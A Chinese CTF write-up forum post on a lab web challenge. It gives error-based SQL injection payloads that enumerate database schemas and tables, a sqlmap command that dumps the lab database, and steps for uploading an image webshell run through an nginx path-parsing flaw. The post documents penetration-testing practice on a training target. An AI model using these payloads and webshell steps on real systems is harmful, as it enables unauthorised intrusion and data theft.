渗透第一步_信息收集1和2 解题报告

Track-聂风   ·   发表于 2022-11-02 18:06:50   ·   CTF&WP专版

前言
做这道题的时候,我的心情真是跌宕起伏。。为什么这么说,且听我娓娓道来。

解题过程
打开传送门,被传送到这个网站


随便点了几个模块,感觉都没有可利用的漏洞,直接扫描目录去了


扫到了admin目录,这个应该是后台登录网址,打开一看果然是


一开始密码暴力破解,没有破解到,开始有点烦躁。
(暴力破解.jpg)这里就不放burp破解的图了,有兴趣可以自己去试

然后想是否存在sql注入绕过密码登录的方法,试了试

无果


那报错注入呢?
输入

' or gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)),1) #

结果还真把报错信息输出到页面上了(内心狂喜)
所有库名一览无遗


接着开始找flag
查找caidian里的表(因为网页是属于caidian目录下的)

' or gtid_subset(concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="caidian")),1) #


找到flag表了!心想flag一定在那个表里

查询flag表的字段

' or gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="flag" and table_schema="caidian")),1) #

查询flag表的记录
' or gtid_subset(concat(0x7e,(select group_concat(concat(id,':',flag)) from caidian.flag)),1) #

flag这不就拿到了吗,简简单单,结果拿去提交发现。。

我还特意试了几遍,还真不是这个flag,烦躁值再+1。这时再想了想,管理员账号密码应该在数据库里把,找到账号密码不就可以登录后台了吗,也许后台有我要的flag,所以直接上sqlmap,找账号密码。

sqlmap -u "http://oovw8022.ia.aqlab.cn:8022/caidian/admin/?r=login" --data="user=12&password=123&login=yes" --technique="E" -v 3 -D caidian --tables --dump-all

找到了账号密码在manage表里


密码解码一下


可以拿去登后台了


然后找了一圈也没发现flag
这是逼我getshell查找网站目录文件内容了
想要getshell就必须找到上传点


找到上传点了,这里只能上传图片文件,那我就上传一个图片马把,至于图片马怎么弄自行百度把
对了,记得上传php木马,下面可以看到该网站使用的脚本语言和服务器,这里nginx1.15.11版本有个解析漏洞,下面会说明


直接访问刚刚文件的上传点(这个上传点地址在资料设置可以看到)http://oovw8022.ia.aqlab.cn:8022/caidian/upload/touxiang/55011641134127.jpg/.php


为什么这里要加/.php
正常访问.jpg浏览器是不能解析php代码的
但是加了/.php就能解析php代码
这就是nginx1.15.11版本的解析漏洞,有兴趣自行了解一下
直接上蚁剑,密码是自己图片马的参数


成功连接

这里找了很久,从一个叫config.php文件中,揪出了flag

拿去提交


顺便提一下,第一次提交的flag好像是信息收集2的flag。。

打赏我,让我更有动力~

0 条回复   |  直到 2022-11-7 | 1283 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.